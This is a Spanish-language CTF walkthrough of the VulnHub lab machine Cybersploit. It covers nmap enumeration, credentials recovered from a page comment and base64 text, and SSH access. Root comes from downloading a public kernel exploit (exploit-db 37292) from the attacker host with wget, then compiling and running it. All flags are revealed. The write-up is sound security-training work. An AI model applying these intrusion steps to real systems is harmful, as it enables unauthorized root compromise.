[VLN] Cybersploit

Hoy vamos a hackear la maquina de Vulnhub llamada Cybersploit. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/cybersploit-1,506/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.78 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 16:25 CEST Nmap scan report for cybersploit-CTF.home (192.168.1.78) Host is up (0.00075s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA) | 2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA) |_ 256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Hello Pentester! Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.24 seconds
    Visitamos http://192.168.1.78/ para ver si encontramos algo interesante en la web. Si miramos en el codigo de la web, podemos ver un comentario al final:
    username:itsskv
    Por otro lado, si visitamos el robots.txt en http://192.168.1.78/robots.txt, encontramos: R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9 Si hacemos el decode con base64 obtenemos:
    ~ > echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d Good Work ! Flag1: cybersploit{youtube.com/c/cybersploit}%
    Nos logueamos con los credenciales: itsskv/cybersploit{youtube.com/c/cybersploit}
  • Low Shell
  • ~ > ssh itsskv@192.168.1.132 The authenticity of host '192.168.1.132 (192.168.1.132)' can't be established. ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.1.132' (ECDSA) to the list of known hosts. itsskv@192.168.1.132's password: Permission denied, please try again. itsskv@192.168.1.132's password: Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686) * Documentation: https://help.ubuntu.com/ 332 packages can be updated. 273 updates are security updates. New release '14.04.6 LTS' available. Run 'do-release-upgrade' to upgrade to it. Your Hardware Enablement Stack (HWE) is supported until April 2017. Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local itsskv@cybersploit-CTF:~$
    Echamos un vistazo a la /home de itsskv.
    itsskv@cybersploit-CTF:~$ ls -la total 156 drwxr-xr-x 20 itsskv itsskv 4096 Jun 27 10:00 . drwxr-xr-x 4 root root 4096 Jun 25 12:11 .. drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Desktop drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Documents drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Downloads -rw-r--r-- 1 itsskv itsskv 8445 Jun 25 12:11 examples.desktop -rw-rw-r-- 1 itsskv itsskv 495 Jun 27 10:03 flag2.txt drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Music drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Pictures -rw-r--r-- 1 itsskv itsskv 675 Jun 25 12:11 .profile drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Videos
    Podemos ver que hay un fichero llamado flag2.txt. Le echamos un vistazo.
    itsskv@cybersploit-CTF:~$ cat flag2.txt 01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
    Vemos que el contenido es un codigo "binario". Vamos a la siguiente web para convertirlo en ascii: https://www.rapidtables.com/convert/number/binary-to-ascii.html El resultado es:
    good work ! flag2: cybersploit{https:t.me/cybersploit1}
    Seguimos mirando el sistema y vemos que tiene un kernel antiguo.
  • Privilege Escalation
  • itsskv@cybersploit-CTF:~$ uname -a Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
    Si buscamos en exploit-db, encontramos el siguiente exploit[1]. Lo descargamos en nuestra maquina, y lo pasamos a la maquina "victima".
    itsskv@cybersploit-CTF:/tmp$ wget http://192.168.1.111/37292.c --2020-07-13 16:17:17-- http://192.168.1.111/37292.c Connecting to 192.168.1.111:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5119 (5.0K) [application/octet-stream] Saving to: `37292.c' 100%[=====================================================>] 5,119 --.-K/s in 0s 2020-07-13 16:17:17 (549 MB/s) - `37292.c' saved [5119/5119]
    Una vez descargado, lo compilamos, le damos permisos de ejecucion y por ultimo lo ejecutamos.
    itsskv@cybersploit-CTF:/tmp$ gcc -o 3 37292.c itsskv@cybersploit-CTF:/tmp$ chmod +x 3 itsskv@cybersploit-CTF:/tmp$ ./3 spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # # id uid=0(root) gid=0(root) groups=0(root),1001(itsskv)
    Obtenemos root :)
  • finalflag.txt
  • # cd /root # ls finalflag.txt # cat finalflag.txt ______ ____ ____ .______ _______ .______ _______..______ __ ______ __ .___________. / |\ \ / / | _ \ | ____|| _ \ / || _ \ | | / __ \ | | | | | ,----' \ \/ / | |_) | | |__ | |_) | | (----`| |_) | | | | | | | | | `---| |----` | | \_ _/ | _ < | __| | / \ \ | ___/ | | | | | | | | | | | `----. | | | |_) | | |____ | |\ \----.----) | | | | `----.| `--' | | | | | \______| |__| |______/ |_______|| _| `._____|_______/ | _| |_______| \______/ |__| |__| _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ ( c | o | n | g | r | a | t | u | l | a | t | i | o | n | s ) \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ flag3: cybersploit{Z3X21CW42C4 many many congratulations !} if you like it share with me https://twitter.com/cybersploit1. Thanks !
  • End
  • Y con esto ya seriamos root de la maquina :) [1] https://www.exploit-db.com/exploits/37292